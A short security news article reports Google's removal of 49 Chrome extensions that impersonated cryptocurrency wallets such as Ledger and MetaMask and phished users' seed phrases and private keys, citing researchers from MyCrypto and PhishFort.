Google has removed 49 Chrome browser extensions from its Web Store that were impersonated as cryptocurrency wallets but contained malicious code to drain sensitive information and steal the digital currencies.
The 49 browser add-ons which is believed to be the work of Russian threat actors, were identified by researchers from MyCrypto and PhishFort.
According to Harry Denley, director of security at MyCrypto, the extensions are phishing for secrets like mnemonic phrases, private keys, and keystore files. When a user enters these details, the extension sends an HTTP POST request to its backend, where the attackers receive the secrets and drain the accounts.
The extensions in question were removed within 24 hours of being reported to Google. But according to an analysis by MyCrypto, these extensions were available on the Web Store as early as February 2020.
Besides, all the extensions functioned similarly with the only difference being the cryptocurrency wallet brands that were impacted such as Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey through 14 unique command-and-control (C2) servers that received the phished data.
The researchers believe that the criminals are after high-value accounts only or that they have to manually sweep the accounts.
Some of the extensions even had a rating of five-star reviews, thus increasing the chances of downloading by an unsuspecting user.
Some of the users also wrote legitimate reviews about the extensions being malicious. Either they might be victims of the phishing scams themselves, or just helping the community to not download.
If you suspect you have become a victim of a malicious browser extension and lost funds, it is advised that you file a report at CryptoScamDB.